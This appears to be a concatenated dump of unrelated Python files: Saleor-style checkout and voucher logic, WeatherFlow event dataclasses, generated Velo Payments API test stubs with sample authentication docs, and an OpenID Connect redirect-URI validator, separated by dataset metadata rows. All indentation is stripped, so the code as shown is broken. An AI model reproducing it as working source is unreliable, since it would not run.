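# line quantity of 5, replace=True yields 3, and a resulting quantity of 0 deletes
# the line entirely.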
def calculate_checkout_quantity(lines: Iterable["CheckoutLineInfo"]):
return sum([line_info.line.quantity for line_info in lines])
def add_variants_to_checkout(checkout, variants, quantities, replace=False):
"""Add variants to checkout.
If a variant is not placed in checkout, a new checkout line will be created.
If quantity is set to 0, checkout line will be deleted.
Otherwise, quantity will be added or replaced (if replace argument is True).
"""
variant_ids_in_lines = {line.variant_id: line for line in checkout.lines.all()}
to_create = []
to_update = []
to_delete = []
for variant, quantity in zip(variants, quantities):
if variant.pk in variant_ids_in_lines:
line = variant_ids_in_lines[variant.pk]
if quantity > 0:
if replace:
line.quantity = quantity
else:
line.quantity += quantity
to_update.append(line)
else:
to_delete.append(line)
elif quantity > 0:
to_create.append(
CheckoutLine(checkout=checkout, variant=variant, quantity=quantity)
)
if to_delete:
CheckoutLine.objects.filter(pk__in=[line.pk for line in to_delete]).delete()
if to_update:
CheckoutLine.objects.bulk_update(to_update, ["quantity"])
if to_create:
CheckoutLine.objects.bulk_create(to_create)
return checkout
def _check_new_checkout_address(checkout, address, address_type):
"""Check if and address in checkout has changed and if to remove old one."""
if address_type == AddressType.BILLING:
old_address = checkout.billing_address
else:
old_address = checkout.shipping_address
has_address_changed = any(
[
not address and old_address,
address and not old_address,
address and old_address and address != old_address,
]
)
remove_old_address = (
has_address_changed
and old_address is not None
and (not checkout.user or old_address not in checkout.user.addresses.all())
)
return has_address_changed, remove_old_address
def change_billing_address_in_checkout(checkout, address):
"""Save billing address in checkout if changed.
Remove previously saved address if not connected to any user.
"""
changed, remove = _check_new_checkout_address(
checkout, address, AddressType.BILLING
)
if changed:
if remove:
checkout.billing_address.delete()
checkout.billing_address = address
checkout.save(update_fields=["billing_address", "last_change"])
def change_shipping_address_in_checkout(
checkout_info: "CheckoutInfo",
address: "Address",
lines: Iterable["CheckoutLineInfo"],
discounts: Iterable[DiscountInfo],
manager: "PluginsManager",
):
"""Save shipping address in checkout if changed.
Remove previously saved address if not connected to any user.
"""
checkout = checkout_info.checkout
changed, remove = _check_new_checkout_address(
checkout, address, AddressType.SHIPPING
)
if changed:
if remove:
checkout.shipping_address.delete() # type: ignore
checkout.shipping_address = address
update_checkout_info_shipping_address(
checkout_info, address, lines, discounts, manager
)
checkout.save(update_fields=["shipping_address", "last_change"])
def _get_shipping_voucher_discount_for_checkout(
manager: PluginsManager,
voucher: Voucher,
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
address: Optional["Address"],
discounts: Optional[Iterable[DiscountInfo]] = None,
):
"""Calculate discount value for a voucher of shipping type."""
if not is_shipping_required(lines):
msg = "Your order does not require shipping."
raise NotApplicable(msg)
shipping_method = checkout_info.shipping_method
if not shipping_method:
msg = "Please select a shipping method first."
raise NotApplicable(msg)
# check if voucher is limited to specified countries
if address:
if voucher.countries and address.country.code not in voucher.countries:
msg = "This offer is not valid in your country."
raise NotApplicable(msg)
shipping_price = calculations.checkout_shipping_price(
manager=manager,
checkout_info=checkout_info,
lines=lines,
address=address,
discounts=discounts,
).gross
return voucher.get_discount_amount_for(shipping_price, checkout_info.channel)
def _get_products_voucher_discount(
manager: PluginsManager,
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
voucher,
discounts: Optional[Iterable[DiscountInfo]] = None,
):
"""Calculate products discount value for a voucher, depending on its type."""
prices = None
if voucher.type == VoucherType.SPECIFIC_PRODUCT:
prices = get_prices_of_discounted_specific_product(
manager, checkout_info, lines, voucher, discounts
)
if not prices:
msg = "This offer is only valid for selected items."
raise NotApplicable(msg)
return get_products_voucher_discount(voucher, prices, checkout_info.channel)
def get_discounted_lines(
lines: Iterable["CheckoutLineInfo"], voucher
) -> Iterable["CheckoutLineInfo"]:
discounted_products = voucher.products.all()
discounted_categories = set(voucher.categories.all())
discounted_collections = set(voucher.collections.all())
discounted_lines = []
if discounted_products or discounted_collections or discounted_categories:
for line_info in lines:
line_product = line_info.product
line_category = line_info.product.category
line_collections = set(line_info.collections)
if line_info.variant and (
line_product in discounted_products
or line_category in discounted_categories
or line_collections.intersection(discounted_collections)
):
discounted_lines.append(line_info)
else:
# If there's no discounted products, collections or categories,
# it means that all products are discounted
discounted_lines.extend(lines)
return discounted_lines
def get_prices_of_discounted_specific_product(
manager: PluginsManager,
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
voucher: Voucher,
discounts: Optional[Iterable[DiscountInfo]] = None,
) -> List[Money]:
"""Get prices of variants belonging to the discounted specific products.
Specific products are products, collections and categories.
Product must be assigned directly to the discounted category, assigning
product to child category won't work.
"""
line_prices = []
discounted_lines: Iterable["CheckoutLineInfo"] = get_discounted_lines(
lines, voucher
)
address = checkout_info.shipping_address or checkout_info.billing_address
discounts = discounts or []
for line_info in discounted_lines:
line = line_info.line
line_total = calculations.checkout_line_total(
manager=manager,
checkout_info=checkout_info,
lines=lines,
checkout_line_info=line_info,
discounts=discounts,
)
line_unit_price = manager.calculate_checkout_line_unit_price(
line_total,
line.quantity,
checkout_info,
lines,
line_info,
address,
discounts,
).gross
line_prices.extend([line_unit_price] * line.quantity)
return line_prices
def get_voucher_discount_for_checkout(
manager: PluginsManager,
voucher: Voucher,
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
address: Optional["Address"],
discounts: Optional[Iterable[DiscountInfo]] = None,
) -> Money:
"""Calculate discount value depending on voucher and discount types.
Raise NotApplicable if voucher of given type cannot be applied.
"""
validate_voucher_for_checkout(manager, voucher, checkout_info, lines, discounts)
if voucher.type == VoucherType.ENTIRE_ORDER:
subtotal = calculations.checkout_subtotal(
manager=manager,
checkout_info=checkout_info,
lines=lines,
address=address,
discounts=discounts,
).gross
return voucher.get_discount_amount_for(subtotal, checkout_info.channel)
if voucher.type == VoucherType.SHIPPING:
return _get_shipping_voucher_discount_for_checkout(
manager, voucher, checkout_info, lines, address, discounts
)
if voucher.type == VoucherType.SPECIFIC_PRODUCT:
return _get_products_voucher_discount(
manager, checkout_info, lines, voucher, discounts
)
raise NotImplementedError("Unknown discount type")
def get_voucher_for_checkout(
checkout_info: "CheckoutInfo", vouchers=None, with_lock: bool = False
) -> Optional[Voucher]:
"""Return voucher with voucher code saved in checkout if active or None."""
checkout = checkout_info.checkout
if checkout.voucher_code is not None:
if vouchers is None:
vouchers = Voucher.objects.active_in_channel(
date=timezone.now(), channel_slug=checkout_info.channel.slug
)
try:
qs = vouchers
voucher = qs.get(code=checkout.voucher_code)
if voucher and voucher.usage_limit is not None and with_lock:
voucher = vouchers.select_for_update().get(code=checkout.voucher_code)
return voucher
except Voucher.DoesNotExist:
return None
return None
def recalculate_checkout_discount(
manager: PluginsManager,
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
discounts: Iterable[DiscountInfo],
):
"""Recalculate `checkout.discount` based on the voucher.
Will clear both voucher and discount if the discount is no longer
applicable.
"""
checkout = checkout_info.checkout
voucher = get_voucher_for_checkout(checkout_info)
if voucher is not None:
address = checkout_info.shipping_address or checkout_info.billing_address
try:
discount = get_voucher_discount_for_checkout(
manager, voucher, checkout_info, lines, address, discounts
)
except NotApplicable:
remove_voucher_from_checkout(checkout)
else:
subtotal = calculations.checkout_subtotal(
manager=manager,
checkout_info=checkout_info,
lines=lines,
address=address,
discounts=discounts,
).gross
checkout.discount = (
min(discount, subtotal)
if voucher.type != VoucherType.SHIPPING
else discount
)
checkout.discount_name = voucher.name
checkout.translated_discount_name = (
voucher.translated.name
if voucher.translated.name != voucher.name
else ""
)
checkout.save(
update_fields=[
"translated_discount_name",
"discount_amount",
"discount_name",
"currency",
]
)
else:
remove_voucher_from_checkout(checkout)
def add_promo_code_to_checkout(
manager: PluginsManager,
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
promo_code: str,
discounts: Optional[Iterable[DiscountInfo]] = None,
):
"""Add gift card or voucher data to checkout.
Raise InvalidPromoCode if promo code does not match to any voucher or gift card.
"""
if promo_code_is_voucher(promo_code):
add_voucher_code_to_checkout(
manager, checkout_info, lines, promo_code, discounts
)
elif promo_code_is_gift_card(promo_code):
add_gift_card_code_to_checkout(checkout_info.checkout, promo_code)
else:
raise InvalidPromoCode()
def add_voucher_code_to_checkout(
manager: PluginsManager,
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
voucher_code: str,
discounts: Optional[Iterable[DiscountInfo]] = None,
):
"""Add voucher data to checkout by code.
Raise InvalidPromoCode() if voucher of given type cannot be applied.
"""
try:
voucher = Voucher.objects.active_in_channel(
date=timezone.now(), channel_slug=checkout_info.channel.slug
).get(code=voucher_code)
except Voucher.DoesNotExist:
raise InvalidPromoCode()
try:
add_voucher_to_checkout(manager, checkout_info, lines, voucher, discounts)
except NotApplicable:
raise ValidationError(
{
"promo_code": ValidationError(
"Voucher is not applicable to that checkout.",
code=CheckoutErrorCode.VOUCHER_NOT_APPLICABLE.value,
)
}
)
def add_voucher_to_checkout(
manager: PluginsManager,
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
voucher: Voucher,
discounts: Optional[Iterable[DiscountInfo]] = None,
):
"""Add voucher data to checkout.
Raise NotApplicable if voucher of given type cannot be applied.
"""
checkout = checkout_info.checkout
address = checkout_info.shipping_address or checkout_info.billing_address
discount = get_voucher_discount_for_checkout(
manager, voucher, checkout_info, lines, address, discounts
)
checkout.voucher_code = voucher.code
checkout.discount_name = voucher.name
checkout.translated_discount_name = (
voucher.translated.name if voucher.translated.name != voucher.name else ""
)
checkout.discount = discount
checkout.save(
update_fields=[
"voucher_code",
"discount_name",
"translated_discount_name",
"discount_amount",
]
)
def remove_promo_code_from_checkout(checkout_info: "CheckoutInfo", promo_code: str):
"""Remove gift card or voucher data from checkout."""
if promo_code_is_voucher(promo_code):
remove_voucher_code_from_checkout(checkout_info, promo_code)
elif promo_code_is_gift_card(promo_code):
remove_gift_card_code_from_checkout(checkout_info.checkout, promo_code)
def remove_voucher_code_from_checkout(checkout_info: "CheckoutInfo", voucher_code: str):
"""Remove voucher data from checkout by code."""
existing_voucher = get_voucher_for_checkout(checkout_info)
if existing_voucher and existing_voucher.code == voucher_code:
remove_voucher_from_checkout(checkout_info.checkout)
def remove_voucher_from_checkout(checkout: Checkout):
"""Remove voucher data from checkout."""
checkout.voucher_code = None
checkout.discount_name = None
checkout.translated_discount_name = None
checkout.discount_amount = Decimal("0.000")
checkout.save(
update_fields=[
"voucher_code",
"discount_name",
"translated_discount_name",
"discount_amount",
"currency",
]
)
def get_valid_shipping_methods_for_checkout(
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
subtotal: "TaxedMoney",
country_code: Optional[str] = None,
):
if not is_shipping_required(lines):
return None
if not checkout_info.shipping_address:
return None
return ShippingMethod.objects.applicable_shipping_methods_for_instance(
checkout_info.checkout,
channel_id=checkout_info.checkout.channel_id,
price=subtotal.gross,
country_code=country_code, # type: ignore
lines=lines,
)
def is_valid_shipping_method(checkout_info: "CheckoutInfo"):
"""Check if shipping method is valid and remove (if not)."""
if not checkout_info.shipping_method:
return False
if not checkout_info.shipping_address:
return False
valid_methods = checkout_info.valid_shipping_methods
if valid_methods is None or checkout_info.shipping_method not in valid_methods:
clear_shipping_method(checkout_info)
return False
return True
def clear_shipping_method(checkout_info: "CheckoutInfo"):
checkout = checkout_info.checkout
checkout.shipping_method = None
update_checkout_info_shipping_method(checkout_info, None)
checkout.save(update_fields=["shipping_method", "last_change"])
def is_fully_paid(
manager: PluginsManager,
checkout_info: "CheckoutInfo",
lines: Iterable["CheckoutLineInfo"],
discounts: Iterable[DiscountInfo],
):
"""Check if provided payment methods cover the checkout's total amount.
Note that these payments may not be captured or charged at all.
"""
checkout = checkout_info.checkout
payments = [payment for payment in checkout.payments.all() if payment.is_active]
total_paid = sum([p.total for p in payments])
address = checkout_info.shipping_address or checkout_info.billing_address
checkout_total = (
calculations.checkout_total(
manager=manager,
checkout_info=checkout_info,
lines=lines,
address=address,
discounts=discounts,
)
- checkout.get_total_gift_cards_balance()
)
checkout_total = max(
checkout_total, zero_taxed_money(checkout_total.currency)
).gross
return total_paid >= checkout_total.amount
def cancel_active_payments(checkout: Checkout):
checkout.payments.filter(is_active=True).update(is_active=False)
def is_shipping_required(lines: Iterable["CheckoutLineInfo"]):
"""Check if shipping is required for given checkout lines."""
return any(
line_info.product.product_type.is_shipping_required for line_info in lines
)
def validate_variants_in_checkout_lines(lines: Iterable["CheckoutLineInfo"]):
variants_listings_map = {line.variant.id: line.channel_listing for line in lines}
not_available_variants = [
variant_id
for variant_id, channel_listing in variants_listings_map.items()
if channel_listing is None or channel_listing.price is None
]
if not_available_variants:
not_available_variants_ids = {
graphene.Node.to_global_id("ProductVariant", pk)
for pk in not_available_variants
}
error_code = CheckoutErrorCode.UNAVAILABLE_VARIANT_IN_CHANNEL
raise ValidationError(
{
"lines": ValidationError(
"Cannot add lines with unavailable variants.",
code=error_code, # type: ignore
params={"variants": not_available_variants_ids},
)
}
)
| 34.087537
| 88
| 0.682786
|
68e30bfd12d1e1270cd1d5f929a0918ecf6a6c27
| 2,583
|
py
|
Python
|
pyweatherflowudp/event.py
|
briis/pyweatherflowudp
|
5a28d674aff4aac8c5cdf6c27f71eee4b98c25e3
|
[
"MIT"
] | 3
|
2021-12-22T21:53:07.000Z
|
2022-01-11T17:28:35.000Z
|
pyweatherflowudp/event.py
|
briis/pyweatherflowudp
|
5a28d674aff4aac8c5cdf6c27f71eee4b98c25e3
|
[
"MIT"
] | 2
|
2021-12-01T06:27:58.000Z
|
2021-12-02T08:45:32.000Z
|
pyweatherflowudp/event.py
|
briis/pyweatherflowudp
|
5a28d674aff4aac8c5cdf6c27f71eee4b98c25e3
|
[
"MIT"
] | 1
|
2021-12-26T18:24:13.000Z
|
2021-12-26T18:24:13.000Z
|
"""Events for WeatherFlow devices."""
from __future__ import annotations
from dataclasses import dataclass
from datetime import datetime
from pint import Quantity
from .const import UNIT_DEGREES, UNIT_KILOMETERS, UNIT_METERS_PER_SECOND
from .helpers import nvl, utc_timestamp_from_epoch
# pylint: disable=line-too-long
@dataclass
class Event:
"""Event base class."""
_epoch: int
@property
def epoch(self) -> int:
"""Return epoch in seconds."""
return self._epoch
@property
def timestamp(self) -> datetime | None:
"""Return the timestamp in UTC."""
return utc_timestamp_from_epoch(self._epoch)
def __repr__(self) -> str: # pragma: no cover
"""Return repr(self)."""
return f"Event<timestamp={self.timestamp}>"
@dataclass
class LightningStrikeEvent(Event):
"""Lightning strike event class."""
_distance: float | None
_energy: int | None
@property
def distance(self) -> Quantity[float]:
"""Return the distance in kilometers."""
return nvl(self._distance, 0) * UNIT_KILOMETERS
@property
def energy(self) -> int:
"""Return the energy.
Energy is just a pure number and has no physical meaning.
"""
return nvl(self._energy, 0)
def __repr__(self) -> str: # pragma: no cover
"""Return repr(self)."""
return (
f"Lightning Strike Event<timestamp={self.timestamp}, speed={self.distance}>"
)
@dataclass
class RainStartEvent(Event):
"""Rain start event class."""
def __repr__(self) -> str: # pragma: no cover
"""Return repr(self)."""
return f"Rain Start Event<timestamp={self.timestamp}>"
@dataclass
class WindEvent(Event):
"""Wind event class."""
_speed: float | None
_direction: int | None
@property
def direction(self) -> Quantity[int]:
"""Return the direction in degrees."""
return nvl(self._direction, 0) * UNIT_DEGREES
@property
def speed(self) -> Quantity[float]:
"""Return the speed in meters per second."""
return nvl(self._speed, 0) * UNIT_METERS_PER_SECOND
def __repr__(self) -> str: # pragma: no cover
"""Return repr(self)."""
return f"Wind Event<timestamp={self.timestamp}, speed={self.speed}, direction={self.direction.m}°>"
@dataclass
class CustomEvent(Event):
"""Custom event."""
name: str
def __repr__(self) -> str: # pragma: no cover
"""Return repr(self)."""
return f"Event<timestamp={self.timestamp}, name={self.name}>"
| 25.07767
| 107
| 0.634921
|
df1d8a8e11de546144920b0a9e59e0134b69e2f6
| 8,130
|
py
|
Python
|
test/test_funding_manager_api.py
|
velopaymentsapi/velo-python
|
59b39555e9714139b4bf697151cc7d15f6dd510e
|
[
"Apache-2.0"
] | null | null | null |
test/test_funding_manager_api.py
|
velopaymentsapi/velo-python
|
59b39555e9714139b4bf697151cc7d15f6dd510e
|
[
"Apache-2.0"
] | null | null | null |
test/test_funding_manager_api.py
|
velopaymentsapi/velo-python
|
59b39555e9714139b4bf697151cc7d15f6dd510e
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Velo Payments APIs
## Terms and Definitions Throughout this document and the Velo platform the following terms are used: * **Payor.** An entity (typically a corporation) which wishes to pay funds to one or more payees via a payout. * **Payee.** The recipient of funds paid out by a payor. * **Payment.** A single transfer of funds from a payor to a payee. * **Payout.** A batch of Payments, typically used by a payor to logically group payments (e.g. by business day). Technically there need be no relationship between the payments in a payout - a single payout can contain payments to multiple payees and/or multiple payments to a single payee. * **Sandbox.** An integration environment provided by Velo Payments which offers a similar API experience to the production environment, but all funding and payment events are simulated, along with many other services such as OFAC sanctions list checking. ## Overview The Velo Payments API allows a payor to perform a number of operations. The following is a list of the main capabilities in a natural order of execution: * Authenticate with the Velo platform * Maintain a collection of payees * Query the payor’s current balance of funds within the platform and perform additional funding * Issue payments to payees * Query the platform for a history of those payments This document describes the main concepts and APIs required to get up and running with the Velo Payments platform. It is not an exhaustive API reference. For that, please see the separate Velo Payments API Reference. ## API Considerations The Velo Payments API is REST based and uses the JSON format for requests and responses. Most calls are secured using OAuth 2 security and require a valid authentication access token for successful operation. See the Authentication section for details. Where a dynamic value is required in the examples below, the {token} format is used, suggesting that the caller needs to supply the appropriate value of the token in question (without including the { or } characters). Where curl examples are given, the –d @filename.json approach is used, indicating that the request body should be placed into a file named filename.json in the current directory. Each of the curl examples in this document should be considered a single line on the command-line, regardless of how they appear in print. ## Authenticating with the Velo Platform Once Velo backoffice staff have added your organization as a payor within the Velo platform sandbox, they will create you a payor Id, an API key and an API secret and share these with you in a secure manner. You will need to use these values to authenticate with the Velo platform in order to gain access to the APIs. The steps to take are explained in the following: create a string comprising the API key (e.g. 44a9537d-d55d-4b47-8082-14061c2bcdd8) and API secret (e.g. c396b26b-137a-44fd-87f5-34631f8fd529) with a colon between them. E.g. 44a9537d-d55d-4b47-8082-14061c2bcdd8:c396b26b-137a-44fd-87f5-34631f8fd529 base64 encode this string. E.g.: NDRhOTUzN2QtZDU1ZC00YjQ3LTgwODItMTQwNjFjMmJjZGQ4OmMzOTZiMjZiLTEzN2EtNDRmZC04N2Y1LTM0NjMxZjhmZDUyOQ== create an HTTP **Authorization** header with the value set to e.g. Basic NDRhOTUzN2QtZDU1ZC00YjQ3LTgwODItMTQwNjFjMmJjZGQ4OmMzOTZiMjZiLTEzN2EtNDRmZC04N2Y1LTM0NjMxZjhmZDUyOQ== perform the Velo authentication REST call using the HTTP header created above e.g. 
via curl: ``` curl -X POST \\ -H \"Content-Type: application/json\" \\ -H \"Authorization: Basic NDRhOTUzN2QtZDU1ZC00YjQ3LTgwODItMTQwNjFjMmJjZGQ4OmMzOTZiMjZiLTEzN2EtNDRmZC04N2Y1LTM0NjMxZjhmZDUyOQ==\" \\ 'https://api.sandbox.velopayments.com/v1/authenticate?grant_type=client_credentials' ``` If successful, this call will result in a **200** HTTP status code and a response body such as: ``` { \"access_token\":\"19f6bafd-93fd-4747-b229-00507bbc991f\", \"token_type\":\"bearer\", \"expires_in\":1799, \"scope\":\"...\" } ``` ## API access following authentication Following successful authentication, the value of the access_token field in the response (indicated in green above) should then be presented with all subsequent API calls to allow the Velo platform to validate that the caller is authenticated. This is achieved by setting the HTTP Authorization header with the value set to e.g. Bearer 19f6bafd-93fd-4747-b229-00507bbc991f such as the curl example below: ``` -H \"Authorization: Bearer 19f6bafd-93fd-4747-b229-00507bbc991f \" ``` If you make other Velo API calls which require authorization but the Authorization header is missing or invalid then you will get a **401** HTTP status response. # noqa: E501
The version of the OpenAPI document: 2.26.124
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import velo_payments
from velo_payments.api.funding_manager_api import FundingManagerApi # noqa: E501
from velo_payments.rest import ApiException
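# --- Illustrative sketch (not generated code, not used by the test stubs) ----
# A minimal, standard-library-only version of the authentication flow that the
# module docstring above walks through: base64-encode "apiKey:apiSecret", send
# it as a Basic Authorization header to the sandbox authenticate endpoint, and
# read back the bearer token. The key/secret values are caller-supplied
# placeholders; only the sandbox URL quoted in the docstring is assumed.
import base64
import json
import urllib.request


def _example_authenticate(api_key, api_secret):
    credentials = base64.b64encode(
        "{}:{}".format(api_key, api_secret).encode("utf-8")).decode("ascii")
    request = urllib.request.Request(
        "https://api.sandbox.velopayments.com/v1/authenticate"
        "?grant_type=client_credentials",
        method="POST",
        headers={"Authorization": "Basic {}".format(credentials)},
    )
    with urllib.request.urlopen(request) as response:
        # Subsequent API calls would send: Authorization: Bearer <access_token>
        return json.loads(response.read())["access_token"]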
class TestFundingManagerApi(unittest.TestCase):
"""FundingManagerApi unit test stubs"""
def setUp(self):
self.api = velo_payments.api.funding_manager_api.FundingManagerApi() # noqa: E501
def tearDown(self):
pass
def test_create_ach_funding_request(self):
"""Test case for create_ach_funding_request
Create Funding Request # noqa: E501
"""
pass
def test_create_funding_request(self):
"""Test case for create_funding_request
Create Funding Request # noqa: E501
"""
pass
def test_create_funding_request_v3(self):
"""Test case for create_funding_request_v3
Create Funding Request # noqa: E501
"""
pass
def test_get_funding_account(self):
"""Test case for get_funding_account
Get Funding Account # noqa: E501
"""
pass
def test_get_funding_account_v2(self):
"""Test case for get_funding_account_v2
Get Funding Account # noqa: E501
"""
pass
def test_get_funding_accounts(self):
"""Test case for get_funding_accounts
Get Funding Accounts # noqa: E501
"""
pass
def test_get_funding_accounts_v2(self):
"""Test case for get_funding_accounts_v2
Get Funding Accounts # noqa: E501
"""
pass
def test_get_source_account(self):
"""Test case for get_source_account
Get details about given source account. # noqa: E501
"""
pass
def test_get_source_account_v2(self):
"""Test case for get_source_account_v2
Get details about given source account. # noqa: E501
"""
pass
def test_get_source_account_v3(self):
"""Test case for get_source_account_v3
Get details about given source account. # noqa: E501
"""
pass
def test_get_source_accounts(self):
"""Test case for get_source_accounts
Get list of source accounts # noqa: E501
"""
pass
def test_get_source_accounts_v2(self):
"""Test case for get_source_accounts_v2
Get list of source accounts # noqa: E501
"""
pass
def test_get_source_accounts_v3(self):
"""Test case for get_source_accounts_v3
Get list of source accounts # noqa: E501
"""
pass
def test_list_funding_audit_deltas(self):
"""Test case for list_funding_audit_deltas
Get Funding Audit Delta # noqa: E501
"""
pass
def test_set_notifications_request(self):
"""Test case for set_notifications_request
Set notifications # noqa: E501
"""
pass
def test_transfer_funds(self):
"""Test case for transfer_funds
Transfer Funds between source accounts # noqa: E501
"""
pass
def test_transfer_funds_v3(self):
"""Test case for transfer_funds_v3
Transfer Funds between source accounts # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
| 53.137255
| 4,651
| 0.719926
|
d9e30b017aaca825ea17e49375143148a2f37711
| 8,660
|
py
|
Python
|
src/oidcendpoint/common/authorization.py
|
anange/oidcendpoint
|
cda647179fbd2fe8d69eb1fddf4b3f6b3ace305c
|
[
"Apache-2.0"
] | null | null | null |
src/oidcendpoint/common/authorization.py
|
anange/oidcendpoint
|
cda647179fbd2fe8d69eb1fddf4b3f6b3ace305c
|
[
"Apache-2.0"
] | null | null | null |
src/oidcendpoint/common/authorization.py
|
anange/oidcendpoint
|
cda647179fbd2fe8d69eb1fddf4b3f6b3ace305c
|
[
"Apache-2.0"
] | null | null | null |
import logging
from urllib.parse import parse_qs
from urllib.parse import splitquery
from urllib.parse import unquote
from urllib.parse import urlencode
from urllib.parse import urlparse
from oidcmsg.exception import ParameterError
from oidcmsg.exception import URIError
from oidcmsg.oauth2 import AuthorizationErrorResponse
from oidcmsg.oidc import AuthorizationResponse
from oidcmsg.oidc import verified_claim_name
from oidcendpoint import sanitize
from oidcendpoint.exception import RedirectURIError
from oidcendpoint.exception import UnknownClient
from oidcendpoint.user_info import SCOPE2CLAIMS
logger = logging.getLogger(__name__)
FORM_POST = """<html>
<head>
<title>Submit This Form</title>
</head>
<body onload="javascript:document.forms[0].submit()">
<form method="post" action="{action}">
{inputs}
</form>
</body>
</html>"""
DEFAULT_SCOPES = list(SCOPE2CLAIMS.keys())
_CLAIMS = set()
for scope, claims in SCOPE2CLAIMS.items():
_CLAIMS.update(set(claims))
DEFAULT_CLAIMS = list(_CLAIMS)
def inputs(form_args):
"""
Creates list of input elements
"""
element = []
html_field = '<input type="hidden" name="{}" value="{}"/>'
for name, value in form_args.items():
element.append(html_field.format(name, value))
return "\n".join(element)
def max_age(request):
verified_request = verified_claim_name("request")
return request.get(verified_request, {}).get("max_age") or request.get("max_age", 0)
def verify_uri(endpoint_context, request, uri_type, client_id=None):
"""
A redirect URI
MUST NOT contain a fragment
MAY contain query component
:param endpoint_context: An EndpointContext instance
:param request: The authorization request
:param uri_type: redirect_uri or post_logout_redirect_uri
:return: An error response if the redirect URI is faulty otherwise
None
"""
_cid = request.get("client_id", client_id)
if not _cid:
logger.error("No client id found")
raise UnknownClient("No client_id provided")
_redirect_uri = unquote(request[uri_type])
part = urlparse(_redirect_uri)
if part.fragment:
raise URIError("Contains fragment")
(_base, _query) = splitquery(_redirect_uri)
if _query:
_query = parse_qs(_query)
match = False
# Get the clients registered redirect uris
redirect_uris = endpoint_context.cdb.get(_cid, {}).get("{}s".format(uri_type))
if not redirect_uris:
raise ValueError("No registered {}".format(uri_type))
else:
for regbase, rquery in redirect_uris:
# The URI MUST exactly match one of the Redirection URI
if _base == regbase:
# every registered query component must exist in the uri
if rquery:
if not _query:
raise ValueError("Missing query part")
for key, vals in rquery.items():
if key not in _query:
raise ValueError('"{}" not in query part'.format(key))
for val in vals:
if val not in _query[key]:
raise ValueError(
"{}={} value not in query part".format(key, val)
)
# and vice versa, every query component in the uri
# must be registered
if _query:
if not rquery:
raise ValueError("No registered query part")
for key, vals in _query.items():
if key not in rquery:
raise ValueError('"{}" extra in query part'.format(key))
for val in vals:
if val not in rquery[key]:
raise ValueError(
"Extra {}={} value in query part".format(key, val)
)
match = True
break
if not match:
raise RedirectURIError("Doesn't match any registered uris")
def join_query(base, query):
"""
:param base: URL base
:param query: query part as a dictionary
:return:
"""
if query:
return "{}?{}".format(base, urlencode(query, doseq=True))
else:
return base
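# Minimal illustrative check (not in the original module): a registered
# redirect URI stored as a (base, query-dict) pair is re-assembled by
# join_query() into a single URL string.
def _join_query_example():
    base, query = "https://rp.example.com/cb", {"state": ["xyz"]}
    assert join_query(base, query) == "https://rp.example.com/cb?state=xyz"
    assert join_query(base, None) == base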
def get_uri(endpoint_context, request, uri_type):
""" verify that the redirect URI is reasonable.
:param endpoint_context: An EndpointContext instance
:param request: The Authorization request
:param uri_type: 'redirect_uri' or 'post_logout_redirect_uri'
:return: redirect_uri
"""
uri = ""
if uri_type in request:
verify_uri(endpoint_context, request, uri_type)
uri = request[uri_type]
else:
uris = "{}s".format(uri_type)
client_id = str(request["client_id"])
if client_id in endpoint_context.cdb:
_specs = endpoint_context.cdb[client_id].get(uris)
if not _specs:
raise ParameterError("Missing {} and none registered".format(uri_type))
if len(_specs) > 1:
raise ParameterError(
"Missing {} and more than one registered".format(uri_type)
)
uri = join_query(*_specs[0])
return uri
def authn_args_gather(request, authn_class_ref, cinfo, **kwargs):
"""
Gather information to be used by the authentication method
"""
authn_args = {
"authn_class_ref": authn_class_ref,
"query": request.to_urlencoded(),
"return_uri": request["redirect_uri"],
}
if "req_user" in kwargs:
authn_args["as_user"] = (kwargs["req_user"],)
# Below are OIDC specific. Just ignore if OAuth2
for attr in ["policy_uri", "logo_uri", "tos_uri"]:
if cinfo.get(attr):
authn_args[attr] = cinfo[attr]
for attr in ["ui_locales", "acr_values", "login_hint"]:
if request.get(attr):
authn_args[attr] = request[attr]
return authn_args
def create_authn_response(endpoint, request, sid):
"""
:param endpoint:
:param request:
:param sid:
:return:
"""
# create the response
aresp = AuthorizationResponse()
if request.get("state"):
aresp["state"] = request["state"]
if "response_type" in request and request["response_type"] == ["none"]:
fragment_enc = False
else:
_context = endpoint.endpoint_context
_sinfo = _context.sdb[sid]
if request.get("scope"):
aresp["scope"] = request["scope"]
rtype = set(request["response_type"][:])
handled_response_type = []
fragment_enc = True
if len(rtype) == 1 and "code" in rtype:
fragment_enc = False
if "code" in request["response_type"]:
_code = aresp["code"] = _context.sdb[sid]["code"]
handled_response_type.append("code")
else:
_context.sdb.update(sid, code=None)
_code = None
if "token" in rtype:
_dic = _context.sdb.upgrade_to_token(issue_refresh=False, key=sid)
logger.debug("_dic: %s" % sanitize(_dic))
for key, val in _dic.items():
if key in aresp.parameters() and val is not None:
aresp[key] = val
handled_response_type.append("token")
_access_token = aresp.get("access_token", None)
not_handled = rtype.difference(handled_response_type)
if not_handled:
resp = AuthorizationErrorResponse(
error="invalid_request", error_description="unsupported_response_type"
)
return {"response_args": resp, "fragment_enc": fragment_enc}
return {"response_args": aresp, "fragment_enc": fragment_enc}
class AllowedAlgorithms:
def __init__(self, algorithm_parameters):
self.algorithm_parameters = algorithm_parameters
def __call__(self, client_id, endpoint_context, alg, alg_type):
_cinfo = endpoint_context.cdb[client_id]
_pinfo = endpoint_context.provider_info
_reg, _sup = self.algorithm_parameters[alg_type]
_allowed = _cinfo.get(_reg)
if _allowed is None:
_allowed = _pinfo.get(_sup)
if alg not in _allowed:
logger.error(
"Signing alg user: {} not among allowed: {}".format(alg, _allowed)
)
raise ValueError("Not allowed '%s' algorithm used", alg)
def re_authenticate(request, authn):
return False
| 31.376812
| 88
| 0.604734
|
d0b9be2d3d0024952973555ed95987f009f91952
| 1,794
|
py
|
